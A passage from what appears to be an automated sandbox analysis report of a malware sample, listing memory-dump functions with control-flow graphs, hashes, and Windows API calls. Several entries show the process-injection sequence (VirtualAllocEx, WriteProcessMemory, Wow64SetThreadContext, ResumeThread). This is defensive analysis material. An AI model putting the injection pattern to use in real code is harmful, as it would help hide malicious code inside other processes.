                                                                        control_flow_graph 173 7a17bc8-7a17c5d 175 7a17c96-7a17cb6 173->175 176 7a17c5f-7a17c69 173->176 183 7a17cb8-7a17cc2 175->183 184 7a17cef-7a17d1e 175->184 176->175 177 7a17c6b-7a17c6d 176->177 178 7a17c90-7a17c93 177->178 179 7a17c6f-7a17c79 177->179 178->175 181 7a17c7b 179->181 182 7a17c7d-7a17c8c 179->182 181->182 182->182 186 7a17c8e 182->186 183->184 185 7a17cc4-7a17cc6 183->185 192 7a17d20-7a17d2a 184->192 193 7a17d57-7a17e11 CreateProcessA 184->193 187 7a17ce9-7a17cec 185->187 188 7a17cc8-7a17cd2 185->188 186->178 187->184 190 7a17cd4 188->190 191 7a17cd6-7a17ce5 188->191 190->191 191->191 194 7a17ce7 191->194 192->193 195 7a17d2c-7a17d2e 192->195 204 7a17e13-7a17e19 193->204 205 7a17e1a-7a17ea0 193->205 194->187 197 7a17d51-7a17d54 195->197 198 7a17d30-7a17d3a 195->198 197->193 199 7a17d3c 198->199 200 7a17d3e-7a17d4d 198->200 199->200 200->200 202 7a17d4f 200->202 202->197 204->205 215 7a17eb0-7a17eb4 205->215 216 7a17ea2-7a17ea6 205->216 218 7a17ec4-7a17ec8 215->218 219 7a17eb6-7a17eba 215->219 216->215 217 7a17ea8 216->217 217->215 221 7a17ed8-7a17edc 218->221 222 7a17eca-7a17ece 218->222 219->218 220 7a17ebc 219->220 220->218 224 7a17eee-7a17ef5 221->224 225 7a17ede-7a17ee4 221->225 222->221 223 7a17ed0 222->223 223->221 226 7a17ef7-7a17f06 224->226 227 7a17f0c 224->227 225->224 226->227 229 7a17f0d 227->229 229->229
                                                                        APIs
                                                                        • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 07A17DFE
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1465742862.0000000007A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A10000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7a10000_13P2mxLaQk.jbxd
                                                                        Similarity
                                                                        • API ID: CreateProcess
                                                                        • String ID:
                                                                        • API String ID: 963392458-0
                                                                        • Opcode ID: 901a425bb6b2ba45d4076a2fb159b2d34b731aaf91aa7ccb210e326e03e44d15
                                                                        • Instruction ID: 09c8c00c317bc0fb43148ce3ea97cbf112f387db5dfdd2255732f1ec50499c68
                                                                        • Opcode Fuzzy Hash: 901a425bb6b2ba45d4076a2fb159b2d34b731aaf91aa7ccb210e326e03e44d15
                                                                        • Instruction Fuzzy Hash: 16914CB1D0021ADFEB10DF69C841BEEBBF2BF88310F148569D818A7280DB759985CF91
                                                                        Function 02DFAFF0 Relevance: 1.7, APIs: 1, Instructions: 195COMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 230 2dfaff0-2dfafff 231 2dfb02b-2dfb02f 230->231 232 2dfb001-2dfb00e call 2dfa9b4 230->232 233 2dfb043-2dfb084 231->233 234 2dfb031-2dfb03b 231->234 237 2dfb024 232->237 238 2dfb010 232->238 241 2dfb086-2dfb08e 233->241 242 2dfb091-2dfb09f 233->242 234->233 237->231 285 2dfb016 call 2dfb279 238->285 286 2dfb016 call 2dfb288 238->286 241->242 244 2dfb0c3-2dfb0c5 242->244 245 2dfb0a1-2dfb0a6 242->245 243 2dfb01c-2dfb01e 243->237 246 2dfb160-2dfb220 243->246 247 2dfb0c8-2dfb0cf 244->247 248 2dfb0a8-2dfb0af call 2dfa9c0 245->248 249 2dfb0b1 245->249 280 2dfb228-2dfb253 GetModuleHandleW 246->280 281 2dfb222-2dfb225 246->281 252 2dfb0dc-2dfb0e3 247->252 253 2dfb0d1-2dfb0d9 247->253 251 2dfb0b3-2dfb0c1 248->251 249->251 251->247 255 2dfb0e5-2dfb0ed 252->255 256 2dfb0f0-2dfb0f9 call 2dfa9d0 252->256 253->252 255->256 261 2dfb0fb-2dfb103 256->261 262 2dfb106-2dfb10b 256->262 261->262 263 2dfb10d-2dfb114 262->263 264 2dfb129-2dfb136 262->264 263->264 266 2dfb116-2dfb126 call 2dfa9e0 call 2dfa9f0 263->266 271 2dfb159-2dfb15f 264->271 272 2dfb138-2dfb156 264->272 266->264 272->271 282 2dfb25c-2dfb270 280->282 283 2dfb255-2dfb25b 280->283 281->280 283->282 285->243 286->243
                                                                        APIs
                                                                        • GetModuleHandleW.KERNELBASE(00000000), ref: 02DFB246
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1459699560.0000000002DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DF0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_2df0000_13P2mxLaQk.jbxd
                                                                        Similarity
                                                                        • API ID: HandleModule
                                                                        • String ID:
                                                                        • API String ID: 4139908857-0
                                                                        • Opcode ID: d3e1d99931989d9ba55233a9a9b5a8f35621f8f739bad71c6a6e2bdb6575bc7f
                                                                        • Instruction ID: ede66ce5ca105c8e3fc7eb6a745bd266ed412ed826766a85d18c4c8063399424
                                                                        • Opcode Fuzzy Hash: d3e1d99931989d9ba55233a9a9b5a8f35621f8f739bad71c6a6e2bdb6575bc7f
                                                                        • Instruction Fuzzy Hash: 67716470A00B058FD764CF2AD44476ABBF1FF88208F11892ED59ADBB40DB35E849CB95
                                                                        Function 02DF5CEC Relevance: 1.6, APIs: 1, Instructions: 98COMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 287 2df5cec-2df5db9 CreateActCtxA 289 2df5dbb-2df5dc1 287->289 290 2df5dc2-2df5e1c 287->290 289->290 297 2df5e1e-2df5e21 290->297 298 2df5e2b-2df5e2f 290->298 297->298 299 2df5e31-2df5e3d 298->299 300 2df5e40 298->300 299->300 302 2df5e41 300->302 302->302
                                                                        APIs
                                                                        • CreateActCtxA.KERNEL32(?), ref: 02DF5DA9
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1459699560.0000000002DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DF0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_2df0000_13P2mxLaQk.jbxd
                                                                        Similarity
                                                                        • API ID: Create
                                                                        • String ID:
                                                                        • API String ID: 2289755597-0
                                                                        • Opcode ID: 3c06994f6bd8e980a8dabfe365dd76603e56717e6cb3692b838cab4bcb67d618
                                                                        • Instruction ID: 95d90df37d5a71921c926b4f9dca3b876f68d140f4dc5f507f0d622171da7887
                                                                        • Opcode Fuzzy Hash: 3c06994f6bd8e980a8dabfe365dd76603e56717e6cb3692b838cab4bcb67d618
                                                                        • Instruction Fuzzy Hash: B041F1B1C00719CBEB24DFA9D984BCEFBB6BF48304F20806AD408AB255DB755945CF90
                                                                        Function 02DF45C8 Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 303 2df45c8-2df5db9 CreateActCtxA 306 2df5dbb-2df5dc1 303->306 307 2df5dc2-2df5e1c 303->307 306->307 314 2df5e1e-2df5e21 307->314 315 2df5e2b-2df5e2f 307->315 314->315 316 2df5e31-2df5e3d 315->316 317 2df5e40 315->317 316->317 319 2df5e41 317->319 319->319
                                                                        APIs
                                                                        • CreateActCtxA.KERNEL32(?), ref: 02DF5DA9
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1459699560.0000000002DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DF0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_2df0000_13P2mxLaQk.jbxd
                                                                        Similarity
                                                                        • API ID: Create
                                                                        • String ID:
                                                                        • API String ID: 2289755597-0
                                                                        • Opcode ID: 630ec9538d173c600d3ab426c062bd3ff04b969215e2200dafb3e07a834189b4
                                                                        • Instruction ID: 0af2908ec2e1c10992bcc19f40f95f2f013fbdca70e2eef7cb5aec8bb08031bd
                                                                        • Opcode Fuzzy Hash: 630ec9538d173c600d3ab426c062bd3ff04b969215e2200dafb3e07a834189b4
                                                                        • Instruction Fuzzy Hash: E641D070C00719CBEB24DFA9D884B8EFBF5BF49304F60806AD508AB255DB756945CF90
                                                                        Function 07A17939 Relevance: 1.6, APIs: 1, Instructions: 75injectionCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 320 7a17939-7a1793e 321 7a17940-7a17946 320->321 322 7a17947-7a1798e 320->322 321->322 324 7a17990-7a1799c 322->324 325 7a1799e-7a179dd WriteProcessMemory 322->325 324->325 327 7a179e6-7a17a16 325->327 328 7a179df-7a179e5 325->328 328->327
                                                                        APIs
                                                                        • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 07A179D0
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1465742862.0000000007A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A10000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7a10000_13P2mxLaQk.jbxd
                                                                        Similarity
                                                                        • API ID: MemoryProcessWrite
                                                                        • String ID:
                                                                        • API String ID: 3559483778-0
                                                                        • Opcode ID: 1d03882b81ccf096233e03c7cdcb3ae6cca18a3b745748007971cf4fe95f273f
                                                                        • Instruction ID: b767550578601d4b654e10cca940de55636d323a03a9b67ac53f6d598636c1b6
                                                                        • Opcode Fuzzy Hash: 1d03882b81ccf096233e03c7cdcb3ae6cca18a3b745748007971cf4fe95f273f
                                                                        • Instruction Fuzzy Hash: 6E3145B1900349DFDB10CFAAC885BEEBBF5BF48310F10842AE958A7241C7799915CBA1
                                                                        Function 07771D8C Relevance: 1.6, APIs: 1, Instructions: 72COMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 332 7771d8c-7773954 334 7773956-777395c 332->334 335 777395f-777396e 332->335 334->335 336 7773973-77739ac DrawTextExW 335->336 337 7773970 335->337 338 77739b5-77739d2 336->338 339 77739ae-77739b4 336->339 337->336 339->338
                                                                        APIs
                                                                        • DrawTextExW.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,077738ED,?,?), ref: 0777399F
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1464117964.0000000007770000.00000040.00000800.00020000.00000000.sdmp, Offset: 07770000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7770000_13P2mxLaQk.jbxd
                                                                        Similarity
                                                                        • API ID: DrawText
                                                                        • String ID:
                                                                        • API String ID: 2175133113-0
                                                                        • Opcode ID: 508c1aeab28c1d2ac683d28ee1f9fe9c2e4fc83d420685103d89e02039d0c17a
                                                                        • Instruction ID: 496551f04ff4b65e8c4b71f6a8b265a0b400781cb5869a874f0206cdd5fccfb3
                                                                        • Opcode Fuzzy Hash: 508c1aeab28c1d2ac683d28ee1f9fe9c2e4fc83d420685103d89e02039d0c17a
                                                                        • Instruction Fuzzy Hash: 5931E3B5900349AFDB10CF9AD884AAEFBF5FB48314F14842AE819A7310D374A944CFA5
                                                                        Function 07773900 Relevance: 1.6, APIs: 1, Instructions: 70COMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 342 7773900-7773954 343 7773956-777395c 342->343 344 777395f-777396e 342->344 343->344 345 7773973-77739ac DrawTextExW 344->345 346 7773970 344->346 347 77739b5-77739d2 345->347 348 77739ae-77739b4 345->348 346->345 348->347
                                                                        APIs
                                                                        • DrawTextExW.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,077738ED,?,?), ref: 0777399F
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1464117964.0000000007770000.00000040.00000800.00020000.00000000.sdmp, Offset: 07770000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7770000_13P2mxLaQk.jbxd
                                                                        Similarity
                                                                        • API ID: DrawText
                                                                        • String ID:
                                                                        • API String ID: 2175133113-0
                                                                        • Opcode ID: d67ebc300e961a9991b9c539bada60967bd9fc6b95ae937b2e606291d7014940
                                                                        • Instruction ID: 4cf0b84d1f47c71bd61e51af3d295a7b572453eda2e1fa0597011daa0b075f92
                                                                        • Opcode Fuzzy Hash: d67ebc300e961a9991b9c539bada60967bd9fc6b95ae937b2e606291d7014940
                                                                        • Instruction Fuzzy Hash: 7E31E3B5D01249DFDB10CFA9D884AAEFBF5BF48210F14842AE819A7211D3749944CFA1
                                                                        Function 07A17369 Relevance: 1.6, APIs: 1, Instructions: 69threadCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 351 7a17369-7a1736e 352 7a17370-7a17376 351->352 353 7a17377-7a173bb 351->353 352->353 355 7a173cb-7a173fb Wow64SetThreadContext 353->355 356 7a173bd-7a173c9 353->356 358 7a17404-7a17434 355->358 359 7a173fd-7a17403 355->359 356->355 359->358
                                                                        APIs
                                                                        • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 07A173EE
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1465742862.0000000007A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A10000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7a10000_13P2mxLaQk.jbxd
                                                                        Similarity
                                                                        • API ID: ContextThreadWow64
                                                                        • String ID:
                                                                        • API String ID: 983334009-0
                                                                        • Opcode ID: 6129a1e9036b03654026b1132f85474eddffd7b9c7b9209ff46e349560ba2872
                                                                        • Instruction ID: 6532c4debaf19248de38fd5a2bf58d1fe677a77d8e44d97c00c358b9994f6dcb
                                                                        • Opcode Fuzzy Hash: 6129a1e9036b03654026b1132f85474eddffd7b9c7b9209ff46e349560ba2872
                                                                        • Instruction Fuzzy Hash: 4A2148B1900309DFEB14CFAAC8857EFFBF5EF88224F148429D859A7241C7789945CBA5
                                                                        Function 07A17940 Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 363 7a17940-7a1798e 366 7a17990-7a1799c 363->366 367 7a1799e-7a179dd WriteProcessMemory 363->367 366->367 369 7a179e6-7a17a16 367->369 370 7a179df-7a179e5 367->370 370->369
                                                                        APIs
                                                                        • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 07A179D0
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1465742862.0000000007A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A10000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7a10000_13P2mxLaQk.jbxd
                                                                        Similarity
                                                                        • API ID: MemoryProcessWrite
                                                                        • String ID:
                                                                        • API String ID: 3559483778-0
                                                                        • Opcode ID: 0e137ceade35e4ac3c60bfb81b439d72b3df9eb03be8929ae25cedae177deb32
                                                                        • Instruction ID: 20860560138aa9f7527dcd0e2b8ee69034f5b3c3ce8fcf777841327a37ce370a
                                                                        • Opcode Fuzzy Hash: 0e137ceade35e4ac3c60bfb81b439d72b3df9eb03be8929ae25cedae177deb32
                                                                        • Instruction Fuzzy Hash: 982139B1900349DFDB10CFAAC881BDEBBF5FF48310F14842AE958A7240C7789944CBA1
                                                                        Function 07A17A28 Relevance: 1.6, APIs: 1, Instructions: 66COMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 374 7a17a28-7a17abd ReadProcessMemory 378 7a17ac6-7a17af6 374->378 379 7a17abf-7a17ac5 374->379 379->378
                                                                        APIs
                                                                        • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 07A17AB0
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1465742862.0000000007A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A10000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7a10000_13P2mxLaQk.jbxd
                                                                        Similarity
                                                                        • API ID: MemoryProcessRead
                                                                        • String ID:
                                                                        • API String ID: 1726664587-0
                                                                        • Opcode ID: c642f29667f3ceadc9f0daf6e1de5c1566f6a9df3676accea4cbc980f69a5829
                                                                        • Instruction ID: bbd823b0561bc9560bf222d475afbcbc303953cda6b4c66973d8e0a844625e1c
                                                                        • Opcode Fuzzy Hash: c642f29667f3ceadc9f0daf6e1de5c1566f6a9df3676accea4cbc980f69a5829
                                                                        • Instruction Fuzzy Hash: AC2136B5800349AFDB10DFAAC881BEEFBF5FF48310F14842AE518A7240C7789541CBA1
                                                                        Function 07A17370 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 07A173EE
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1465742862.0000000007A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A10000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7a10000_13P2mxLaQk.jbxd
                                                                        Similarity
                                                                        • API ID: ContextThreadWow64
                                                                        • String ID:
                                                                        • API String ID: 983334009-0
                                                                        • Opcode ID: 4965ade207c0596da302bd5dd580d278f076eb7ed447fa75272fa28d2dd14698
                                                                        • Instruction ID: 37b44fde5e7ca2a5536fa4761c17337b6814bd63a243134f07cab76fd9eeb012
                                                                        • Opcode Fuzzy Hash: 4965ade207c0596da302bd5dd580d278f076eb7ed447fa75272fa28d2dd14698
                                                                        • Instruction Fuzzy Hash: 512129B19003099FEB14DFAAC8857EFFBF4EF88214F14842AD419A7241C7789945CFA5
                                                                        Function 07A17A30 Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 07A17AB0
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1465742862.0000000007A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A10000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7a10000_13P2mxLaQk.jbxd
                                                                        Similarity
                                                                        • API ID: MemoryProcessRead
                                                                        • String ID:
                                                                        • API String ID: 1726664587-0
                                                                        • Opcode ID: 13d5e4855452fe66f0d9a3b79309b6413c8167347a4c2545dc8c20e1bfce5f1f
                                                                        • Instruction ID: 18406d6c679ff84b66d20c193f9c48767bc77dbef729161bf82709158e56a4ee
                                                                        • Opcode Fuzzy Hash: 13d5e4855452fe66f0d9a3b79309b6413c8167347a4c2545dc8c20e1bfce5f1f
                                                                        • Instruction Fuzzy Hash: 492125B18003499FDB10DFAAC881BEEFBF5FF48310F14842AE518A7240C7799941CBA1
                                                                        Function 02DFD4C8 Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 02DFD54F
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1459699560.0000000002DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DF0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_2df0000_13P2mxLaQk.jbxd
                                                                        Similarity
                                                                        • API ID: DuplicateHandle
                                                                        • String ID:
                                                                        • API String ID: 3793708945-0
                                                                        • Opcode ID: 914557faf4feac9db3351e218e310cf6c61cfaba88ea15ca5e85e51871a8aebc
                                                                        • Instruction ID: 480ce3d89f68c4d2ce66c78aa09bdfdf198c7c5401f2bbd259c15b935e76eebf
                                                                        • Opcode Fuzzy Hash: 914557faf4feac9db3351e218e310cf6c61cfaba88ea15ca5e85e51871a8aebc
                                                                        • Instruction Fuzzy Hash: E821C4B5900248DFDB10CFAAD984ADEFBF9FB48314F14841AE918A7350D374A944CF65
                                                                        Function 02DFD4C1 Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 02DFD54F
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1459699560.0000000002DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DF0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_2df0000_13P2mxLaQk.jbxd
                                                                        Similarity
                                                                        • API ID: DuplicateHandle
                                                                        • String ID:
                                                                        • API String ID: 3793708945-0
                                                                        • Opcode ID: 2ed29201f29bc62c8d4f6e8f66444c3bc52232b2aa0250a5f8a37db7525c0a99
                                                                        • Instruction ID: 798712f645f876952f4123d384f4f3f11ab626cf04aacd3742d3fca62cbde77c
                                                                        • Opcode Fuzzy Hash: 2ed29201f29bc62c8d4f6e8f66444c3bc52232b2aa0250a5f8a37db7525c0a99
                                                                        • Instruction Fuzzy Hash: 7421E3B5900208DFDB10CFA9D984BDEBBF9FB48314F14841AE918A3310D378A944CF65
                                                                        Function 07A17878 Relevance: 1.6, APIs: 1, Instructions: 56memoryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 07A178EE
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1465742862.0000000007A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A10000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7a10000_13P2mxLaQk.jbxd
                                                                        Similarity
                                                                        • API ID: AllocVirtual
                                                                        • String ID:
                                                                        • API String ID: 4275171209-0
                                                                        • Opcode ID: 813a95acd2f500ea69038e37c5d4f211d525aaa3330cc43b15dbeb5068600a28
                                                                        • Instruction ID: c9df832ba25767656256c87db47ee91137fc478432d4e6b16d0fa3ce0a265995
                                                                        • Opcode Fuzzy Hash: 813a95acd2f500ea69038e37c5d4f211d525aaa3330cc43b15dbeb5068600a28
                                                                        • Instruction Fuzzy Hash: 7E1167768002489FDB10CFAAC840BEFBBF5AB88320F148419E415A7210C7759541CFA1
                                                                        Function 07A172B9 Relevance: 1.6, APIs: 1, Instructions: 55threadCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1465742862.0000000007A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A10000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7a10000_13P2mxLaQk.jbxd
                                                                        Similarity
                                                                        • API ID: ResumeThread
                                                                        • String ID:
                                                                        • API String ID: 947044025-0
                                                                        • Opcode ID: 70fbd013471b068fe00ca7f478eefcc4a1437436d6913ffff0ef8537f7d2445e
                                                                        • Instruction ID: 637b3d9ddeee9417d5a7e26e672414b6165f037ad74570b6b389d61167e12cdd
                                                                        • Opcode Fuzzy Hash: 70fbd013471b068fe00ca7f478eefcc4a1437436d6913ffff0ef8537f7d2445e
                                                                        • Instruction Fuzzy Hash: 6A117CB19043498FDB24DFAAC8457EFFFF5AF88210F24885DD455A7240C7796901CBA5
                                                                        Function 07A17880 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 07A178EE
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1465742862.0000000007A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A10000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7a10000_13P2mxLaQk.jbxd
                                                                        Similarity
                                                                        • API ID: AllocVirtual
                                                                        • String ID:
                                                                        • API String ID: 4275171209-0
                                                                        • Opcode ID: 2b7a43ad04caa0b61e12154d034f3b8c0e78e258392c3c0836b1c8659b60cbd6
                                                                        • Instruction ID: 5606d5babd25a04814d3e82dc51db58352bbb4063afbb0c75d04603cc9e8c858
                                                                        • Opcode Fuzzy Hash: 2b7a43ad04caa0b61e12154d034f3b8c0e78e258392c3c0836b1c8659b60cbd6
                                                                        • Instruction Fuzzy Hash: 5C1123729003499FDB10DFAAC845BEFBBF5AB88320F148819E519A7250C775A941CBA1
                                                                        Function 07A172C0 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1465742862.0000000007A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A10000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7a10000_13P2mxLaQk.jbxd
                                                                        Similarity
                                                                        • API ID: ResumeThread
                                                                        • String ID:
                                                                        • API String ID: 947044025-0
                                                                        • Opcode ID: 11abe41aa30531b4249cde12036b73efab179e22672dd394cacc7aac15c0ee31
                                                                        • Instruction ID: 60b1dbe43d3c2e31b1590fdedaa067f445e4b88dced0e67f1a07908783af51b1
                                                                        • Opcode Fuzzy Hash: 11abe41aa30531b4249cde12036b73efab179e22672dd394cacc7aac15c0ee31
                                                                        • Instruction Fuzzy Hash: BF113AB19003498FDB24DFAAD8457DFFBF5AB88210F148419D419A7240CB756941CBA5
                                                                        Function 02DFB1E0 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • GetModuleHandleW.KERNELBASE(00000000), ref: 02DFB246
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1459699560.0000000002DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DF0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_2df0000_13P2mxLaQk.jbxd
                                                                        Similarity
                                                                        • API ID: HandleModule
                                                                        • String ID:
                                                                        • API String ID: 4139908857-0
                                                                        • Opcode ID: d5d71cd4c8dee71165e1c3e0d8f5946b805f0a9dae248f9305d11747ed4989c0
                                                                        • Instruction ID: 2d2ba5a73f38f8d1ddde2dbb3bc67a6f2e8e360a09ae3e9d9fc9e443d84f4366
                                                                        • Opcode Fuzzy Hash: d5d71cd4c8dee71165e1c3e0d8f5946b805f0a9dae248f9305d11747ed4989c0
                                                                        • Instruction Fuzzy Hash: 0A1110B6C00649CFDB10CF9AD844BDEFBF4AF88214F11841AD918A7700C375A545CFA5
                                                                        Function 07A19E68 Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • PostMessageW.USER32(?,00000010,00000000,?), ref: 07A1C0B5
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1465742862.0000000007A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A10000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7a10000_13P2mxLaQk.jbxd
                                                                        Similarity
                                                                        • API ID: MessagePost
                                                                        • String ID:
                                                                        • API String ID: 410705778-0
                                                                        • Opcode ID: 48ceac64a2278e4f0f7461d535bf046222f71019c1180a03890f239548f6337a
                                                                        • Instruction ID: 26ec447c056eea53296da29eb99679cc72cf071cd007632a36b919cb4598c308
                                                                        • Opcode Fuzzy Hash: 48ceac64a2278e4f0f7461d535bf046222f71019c1180a03890f239548f6337a
                                                                        • Instruction Fuzzy Hash: 5511E3B58006499FDB20DF9AD845BDEBBF8EB48320F108459E514A7240C375A944CFA1
                                                                        Function 015ED4C4 Relevance: .1, Instructions: 75COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1459355334.00000000015ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 015ED000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_15ed000_13P2mxLaQk.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 5782d7a644d6d7160a3c5090ea4428d39f5df330fdc46528c10a293ac7c4ed60
                                                                        • Instruction ID: a14fdf6cfc33acd64f3160938f693d104a4a26a8f6defe3e3c5e07574b8f9eb0
                                                                        • Opcode Fuzzy Hash: 5782d7a644d6d7160a3c5090ea4428d39f5df330fdc46528c10a293ac7c4ed60
                                                                        • Instruction Fuzzy Hash: 58210672900244DFDB19DF54D9C4B2ABFF5FB84318F24C56AE8050F256C336D456CAA2
                                                                        Function 015FD01C Relevance: .1, Instructions: 72COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1459417245.00000000015FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 015FD000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_15fd000_13P2mxLaQk.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 5effd9b7679ec0e017babf55c246c2d7b7b71257d4cd832ccf679e441052773c
